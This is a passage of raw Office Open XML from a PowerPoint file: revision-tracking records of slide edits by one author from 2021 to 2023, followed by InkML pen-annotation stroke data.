      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:28:00.166" v="1037" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="951356934" sldId="506"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:39.692" v="779" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:39.692" v="779" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:07.319" v="1020" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:spMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:54.257" v="783" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:16.205" v="775" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:spMk id="13" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:29.736" v="778" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:spMk id="15" creationId="{05A84F03-3BE5-4BFF-9DA4-E19E32FD84AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="10" creationId="{4FFFE899-AC25-2316-2225-FF61F11242D4}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:31.481" v="1025"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="13" creationId="{5E0BAF26-E70C-32CD-85C5-348CA092D882}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="18" creationId="{3ADB0E17-734B-35F4-0483-1C8BF150F094}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:40.326" v="1031"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="21" creationId="{4E695CFF-1D2C-4273-1C31-6D7D48FECC1E}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:46.957" v="1034"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:grpSpMk id="24" creationId="{760F4072-955C-7D20-F667-223D0A0BB030}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:03:19.527" v="764" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:picMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:39.692" v="779" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:picMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:03:46.703" v="768" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:picMk id="14" creationId="{34B348BD-A2F6-402E-B0EF-FD6D02594ACF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:31.481" v="1025"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="3" creationId="{A806AB91-F5ED-D09C-5416-1C1790B0E281}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:31.481" v="1025"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="4" creationId="{745D203D-AA7B-0F29-F1BC-67818FB7E702}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="8" creationId="{CD55B8C8-DFC8-D328-CFE5-E0EF67763EAD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="9" creationId="{30E44AA8-E4AB-D84B-6D7C-19B58426C5FD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="16" creationId="{B55186A4-12A8-0F06-BD98-3C1C19E10B26}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:35.755" v="1028"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="17" creationId="{8D4E8F2B-787C-FA74-48A6-FB09DCB8EB0E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:40.326" v="1031"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="19" creationId="{89453CD5-A27C-BEEA-1C3C-25033544C231}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:40.326" v="1031"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="20" creationId="{9F38F2D8-6546-53E9-AA19-8B251B406328}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:46.957" v="1034"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="22" creationId="{8975A4BB-7325-6AFE-302E-B6E9D7FF22F8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:46.957" v="1034"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="23" creationId="{390D2FF0-33B9-0789-38EE-9B33CFC3C6EC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:58.902" v="1035" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="25" creationId="{827DF6C7-4049-53AB-E939-22D611165851}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:27:59.365" v="1036" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="26" creationId="{3D27415F-F638-7958-0F63-39073B0D9045}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-08-30T14:28:00.166" v="1037" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:inkMk id="27" creationId="{5C4485D2-763A-154F-9E32-3A29273361A0}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:39.692" v="779" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:cxnSpMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:04:47.562" v="782" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="951356934" sldId="506"/>
            <ac:cxnSpMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:20:42.424" v="822" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1385115538" sldId="507"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:20:42.424" v="822" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1385115538" sldId="507"/>
            <ac:spMk id="2" creationId="{949834CC-EE51-45E6-AC16-55466089F92B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T19:05:20.301" v="785" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1385115538" sldId="507"/>
            <ac:picMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2023-02-10T00:22:52.419" v="1289" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="494372939" sldId="508"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2023-02-10T00:22:52.419" v="1289" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="494372939" sldId="508"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:46:23.285" v="206" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3063836972" sldId="510"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:44:47.110" v="79" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063836972" sldId="510"/>
            <ac:spMk id="2" creationId="{9FF1AB65-73B9-4E0B-A8C8-4BF7E6CF0611}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:44:47.110" v="79" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063836972" sldId="510"/>
            <ac:spMk id="3" creationId="{AFEFD8AF-D50C-45E5-902E-7AAD718F43F6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:45:03.863" v="88" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063836972" sldId="510"/>
            <ac:spMk id="4" creationId="{D3BC4124-87C8-4743-8E1C-273BB86DC97E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:46:23.285" v="206" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063836972" sldId="510"/>
            <ac:spMk id="5" creationId="{7032E3DA-7F7C-4137-9921-D28D7A17B054}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2023-02-10T00:24:31.695" v="1298" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2910342646" sldId="511"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T16:28:55.874" v="522" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2910342646" sldId="511"/>
            <ac:spMk id="2" creationId="{B8E04ABA-149E-4CE9-98C4-9F02F632CB5C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2023-02-10T00:24:31.695" v="1298" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2910342646" sldId="511"/>
            <ac:spMk id="3" creationId="{E557CAF6-7771-4DA8-97BD-9E8E765BDF8E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2023-02-10T00:01:16.059" v="1283" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1504836039" sldId="512"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:04:43.926" v="1139" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1504836039" sldId="512"/>
            <ac:spMk id="2" creationId="{07CD4BDF-0DE5-09BD-9D84-5B31B3A1A165}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2023-02-10T00:01:16.059" v="1283" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1504836039" sldId="512"/>
            <ac:spMk id="3" creationId="{791C76E6-6D86-29EF-DD53-CB8A670CA499}"/>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14.429"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">311 1 24575,'7'39'0,"-6"-36"0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,-2 2 0,-58 69 0,54-63 0,1 0 0,0 1 0,1 0 0,0 0 0,1 1 0,1-1 0,-7 27 0,7-29 0,0 1 0,-1 0 0,0-1 0,-1 0 0,-1 0 0,1-1 0,-1 1 0,-1-2 0,0 1 0,-10 8 0,-31 39 0,35-37 0,9-14 0,0 1 0,0 0 0,1 1 0,0-1 0,0 1 0,0-1 0,1 1 0,0 0 0,1 1 0,-1-1 0,1 0 0,1 1 0,0-1 0,-1 15 0,1 16 0,0-16 0,1 1 0,0 0 0,8 40 0,-4-54 0,0 1 0,1-1 0,0 0 0,1 0 0,0 0 0,0-1 0,13 13 0,-4-3 0,-9-12 0,0 1 0,0-1 0,1-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-1-1 0,1 0 0,0-1 0,0 1 0,1-2 0,-1 1 0,1-1 0,-1 0 0,1-1 0,0 0 0,10 0 0,53 9 0,-52-6 0,-1-1 0,23 0 0,3-2 0,-13 0 0,1-1 0,34-5 0,-58 4 0,0 0 0,0-1 0,-1 0 0,1-1 0,-1 0 0,1-1 0,-1 1 0,0-1 0,0-1 0,-1 0 0,1 0 0,8-8 0,68-66 0,-76 73 0,-1-1 0,1 1 0,0 1 0,1-1 0,-1 2 0,1-1 0,13-4 0,-13 5 0,0 1 0,-1-2 0,0 1 0,1-1 0,-1 0 0,-1-1 0,1 0 0,9-10 0,60-91 0,-70 96 0,0 0 0,0-1 0,-1 1 0,-1-1 0,0-1 0,0 1 0,-1-1 0,3-20 0,6-13 0,1 1 0,-7 27 0,-2 0 0,0 0 0,0-1 0,-2 1 0,2-38 0,-3 16 0,-1 27 0,0 0 0,-1 0 0,0 0 0,-1 0 0,-1 0 0,0 0 0,-6-21 0,6 30 0,0-1 0,-1 1 0,0 0 0,1 0 0,-2 0 0,1 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1 0 0,0 0 0,1 1 0,-1-1 0,0 1 0,-6-1 0,-11 0 0,0 0 0,0 1 0,-36 4 0,7 0 0,-306-3 0,337 1 20,1 2-1,0 0 0,0 1 0,0 1 1,-26 11-1,-40 9-1500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15:26.200"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'0'3'0,"4"1"0,3 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22:05.146"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'4'0'0,"3"0"0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22:16.952"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1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24:30.794"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'4'0'0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23:37.763"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575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26:49.883"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0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29:12.468"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0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35:37.926"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'3'0'0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39:26.527"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'0'3'0,"3"2"0,5-1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5:56.349"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
